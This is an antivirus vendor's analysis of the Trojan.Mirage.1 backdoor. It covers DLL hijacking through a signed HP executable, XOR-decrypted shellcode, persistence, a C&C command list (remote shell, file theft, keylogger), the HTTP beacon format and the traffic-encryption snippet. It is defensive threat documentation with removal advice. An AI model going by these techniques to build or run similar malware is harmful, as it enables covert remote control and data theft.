Meine Bibliothek
Meine Bibliothek

+ Zur Bibliothek hinzufügen

Support

Ihre Anfragen

Rufen Sie uns an

+7 (495) 789-45-86

Profil

Trojan.Mirage.1

Added to the Dr.Web virus database: 2020-05-08

Virus description added:

Packer: absent

Compilation dates:
12:37:30 12.09.2018 (rapi.dll loader)
14:04:26 25.09.2018 (Server.dll payload module)

SHA1 hashes:

  • c4ef5981bee97c78d29fb245d84146a5db710782 (rapi.dll)
  • 34085c6d935c4df7ce7f80297b0c14a8d3b436d8 (cmdl32.dat)
  • d4558761c52027bf52aa9829bbb44fe12920381d (server.dll)

Description

Trojan.Mirage.1 is a multi-component backdoor trojan designed for Windows 32-bit operating systems. It is used for unauthorized control of infected computers and accessing information stored on them. The infection is implemented through a loader injection into the valid running system process. The payload unpacking and arbitrary code execution is done on the infected computer’s RAM.

Operating routine

Trojan.Mirage.1 has the following file suite:

  • WmiPrvServer.exe — file with a valid HP digital signature
    CN=Hewlett-Packard Company
    OU=Hewlett-Packard Company
    OU=Digital ID Class 3 - Microsoft Software Validation v2
    O=Hewlett-Packard Company
    L=Palo Alto
    S=California
    C=US
    
  • rapi.dll — the loader. It loads on the WmiPrvServer.exe process using the DLL Hijacking method
  • cmdl32.dat — the encrypted shell code with the payload
  • config.dat — the encrypted configuration

Rapi.dll loader module

The loader module is injected into the WmiPrvServer.exe process using the DLL Hijacking. The program receives the GetProcAddress function address through the PEB (Process Environment Block) structure by comparing the strings. After that it receives the addresses of the necessary imported functions:

LoadLibraryA
GetModuleFileNameA
VirtualAlloc
CloseHandle
CreateFileA
GetFileSize
ReadFile

Next, the cmdl32.dat file, located in the same directory from where the parent process of the trojan was launched, is read. The loader decrypts the file using the XOR operation with the 0x88 byte and jumps to the decrypted buffer using the JMP instruction.

Mirage #drweb

The encrypted shellcode cmdl32.dat

At the start, the shellcode calculates the size of the payload. The beginning of the payload is found through the call of the last shellcode function, and its end is determined by the 0xDDCCBBAA signature.

Mirage #drweb

Next, the program receives the list of necessary imported functions. Through the PEB structure, the trojan locates the GetProcAddress function, which it instantly uses to get the LoadLibraryA function address. The search for the rest of the imports is done through these two functions.

strcmp
memcpy
VirtualAlloc
VirtualProtect
WriteFile
lstrcatA
GetModuleHandleA
IsDebuggerPresent

Next, Trojan.Mirage.1 decrypts the payload using the XOR operation with the 0xCC byte, loads the resulting MZPE file onto the memory and calls the mystart exported function.

The payload

The payload module represents a dynamic library with the exported functions:

OnWork
RunUninstallA
Uninstall
mystart

Below, we will dissect two major functions responsible for the trojan operation: mystart and OnWork.

mystart function

At the beginning, the %TEMP%\\installstat.tmp file is checked to be present. If it exists, Trojan.Mirage.1 reads a proxy server address from it and then deletes this file.

c:\\programdata\\Tmp\\cmd32\\cmd32 is used as a home directory, herewith the creation, modification and access date for the c:\\programdata\\Tmp\\cmd32\\cmd32 and c:\\programdata\\Tmp\\ folders are copied from the %WINDIR%\\System32\\winver.exe file.

The Global\\dawdwere4de2wrw mutex is used to ensure that only one instance of the malware is running.

At this stage, the program checks for the presence of the avp.exe and avpui.exe processes. If even one of them is found, then throughout its further operation the trojan will additionally verify the presence of the object with the Global\\v2kjgtts1 event name. If it locates it, the trojan will halt its further operation.

Trojan.Mirage.1 can operate in 3 modes.

While operating as a service, it checks if the event object with the Global\\v2kjgtts1 name exists. If the event object is missing, it copies its files from the current directory onto c:\\programdata\\Tmp\\cmd32\\cmd32 and injects either into the iexplore.exe process (for the Windows systems, starting from Windows Vista and higher) or into the explorer.exe process (for the Windows systems below Windows Vista).

While operating in the context of the explorer.exe or iexplore.exe processes, it deletes its files from the %TEMP% directory, checks if the Global\\dawdwere4de2wrw mutex is present and creates it if missing. If the trojan is launched with elevated privileges, it creates the Windows Event Update service; otherwise, it configures its autorun through the [HKCU\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows] 'Load' registry key and proceeds to execute its main functions.

For the rest of the cases, Trojan.Mirage.1 checks for the Global\\dawdwere4de2wrw mutex. If it is missing, the malware injects either into the iexplore.exe process (for the Windows systems, starting from Windows Vista and higher) or into the explorer.exe process (for the Windows systems below Windows Vista).

OnWork Function

After receiving the imported functions, the application proceeds to execute its main functions, skipping installation onto the system routine.

It reads the c:\\programdata\\Tmp\\cmd32\\cmd32\\config.dat file and decrypts it using the following algorithm:

Mirage #drweb

The configuration has the following structure:

struct st_config
{
  char cnc_addr[32];
  char cnc_port[16];
  char interval[16];
  char timeout[16];
  char unk3[16];
  _DWORD unk4;
  char trojan_name[16];
  _DWORD unk5;
  wchar_t campaign[32];
};

Next, Trojan.Mirage.1 collects various information about the infected computer and forms the following structure:

struct st_info
{
  wchar_t version[32];
  wchar_t pc_name_user[64];
  wchar_t bot_ip[64];
  wchar_t macaddr[64];
  _DWORD osver;
  _DWORD cpufreq;
  _DWORD cpunumber;
  _DWORD physmem;
  _DWORD is_wow64_process;
};

The %s-v1.0-%s line is stored in the version field; with that, the v1.0 value is hardcoded in the analyzed sample, while the two other lines, trojan_name and campaign, are taken from the settings.

Next, an attempt to connect to the C&C server is made. To do so, the trojan checks for the proxy server settings in the [HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings] 'ProxyEnable' and [HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings] 'ProxyServer' registry entries. If settings are found, the trojan uses the corresponding proxy server in its further requests.

Trojan.Mirage.1 connects to the C&C server listed in its configuration and sends the following packet:

struct st_hello
{
  _DWORD dword0; // 'f'
  _DWORD dword4; // random value 
  _DWORD dword8; // random value 
  _DWORD dwordC; // random value 
  wchar_t text[256]; // "Neo,welcome to the desert of real."
};

In response, it receives the following commands to execute:

  • 0 — send information about the infected computer;
  • 1 — run the plugin designed to work with the file system;
  • 2 — run the plugin designed to work with the command shell;
  • 5 — run the plugin to work with the processes;
  • 6 — run the plugin to work with the command shell on behalf of another user;
  • 7 — run the keylogger plugin;
  • 51 — send information about the infected computer;
  • 52 — download an update for the trojan;
  • 53 — disconnect from the server;
  • 54 — disconnect from the server;
  • 200 — send the information about storage devices installed in the system;
  • 201 — send the directory listing;
  • 202 — delete a file;
  • 203 — move a file;
  • 204 — upload a file to the server;
  • 205 — download a file from the server;
  • 206 — create a directory;
  • 207 — run a command with the cmd.exe;
  • 300 — send a list of the processes in the infected system to the server;
  • 301 — kill a process with a specific identifier;
  • 400 — upload an event log of the keylogger to the server.

C&C server connection protocol

The HTTP protocol is used to connect the malware with the C&C server. The requests have the following format:

POST http://<cnc_addr>:<cnc_port>/result?hl=en&id=<id> HTTP/1.1\r\n
Accept: */*\r\n
Accept-Language: en-us\r\n
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)\r\n
Proxy-Connection: Keep-Alive\r\n
Content-Length: %d\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Encoding: gzip, deflate\r\n
Host: %s:%d\r\n\r\n

Where <cnc_addr> is the C&C server address; <cnc_port> is the port of the C&C server; <id> is a random string of lower-case letters of the Latin alphabet. The unique <id> is generated for each request.

The data for the POST-request and the response is encrypted with the following algorithm:

for ( i = 0; i < data_size; ++i )
  request[req_header_len + i] = (i ^ 0x7C) + data[i];

The first DWORD in the server response is the identifier of the command, which should be executed by the bot. The rest of the buffer can contain the additional parameters for this command.

The plugin designed to work with the command shell

For the input/output redirection from the cmd.exe process, the following three files are used:

  • %TEMP%\\cache\\sysin_%d.log
  • %TEMP%\\cache\\sysout_%d.log
  • %TEMP%\\cache\\systemp_%d.log

Where %d is a random number, which is the same for all three files; it is generated at the time of the plugin launch. If the plugin has been launched with command №6, the command buffer should contain the domain and user login and password, from under which the command shell is being launched.

After that, the trojan launches the command shell with the input/output redirection onto the files, mentioned earlier. The contents of the sysout_%d.log file will be sent to the C&C server, and the response will be stored in the sysin_%d.log file.

Curing recommendations

  1. If the operating system (OS) can be loaded (either normally or in safe mode), download Dr.Web Security Space and run a full scan of your computer and removable media you use. More about Dr.Web Security Space.
  2. If you cannot boot the OS, change the BIOS settings to boot your system from a CD or USB drive. Download the image of the emergency system repair disk Dr.Web® LiveDisk , mount it on a USB drive or burn it to a CD/DVD. After booting up with this media, run a full scan and cure all the detected threats.
Download Dr.Web

Download by serial number

Use Dr.Web Anti-virus for macOS to run a full scan of your Mac.

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Download Dr.Web

Download by serial number

  1. If the mobile device is operating normally, download and install Dr.Web for Android. Run a full system scan and follow recommendations to neutralize the detected threats.
  2. If the mobile device has been locked by Android.Locker ransomware (the message on the screen tells you that you have broken some law or demands a set ransom amount; or you will see some other announcement that prevents you from using the handheld normally), do the following:
    • Load your smartphone or tablet in the safe mode (depending on the operating system version and specifications of the particular mobile device involved, this procedure can be performed in various ways; seek clarification from the user guide that was shipped with the device, or contact its manufacturer);
    • Once you have activated safe mode, install the Dr.Web for Android onto the infected handheld and run a full scan of the system; follow the steps recommended for neutralizing the threats that have been detected;
    • Switch off your device and turn it on as normal.

Find out more about Dr.Web for Android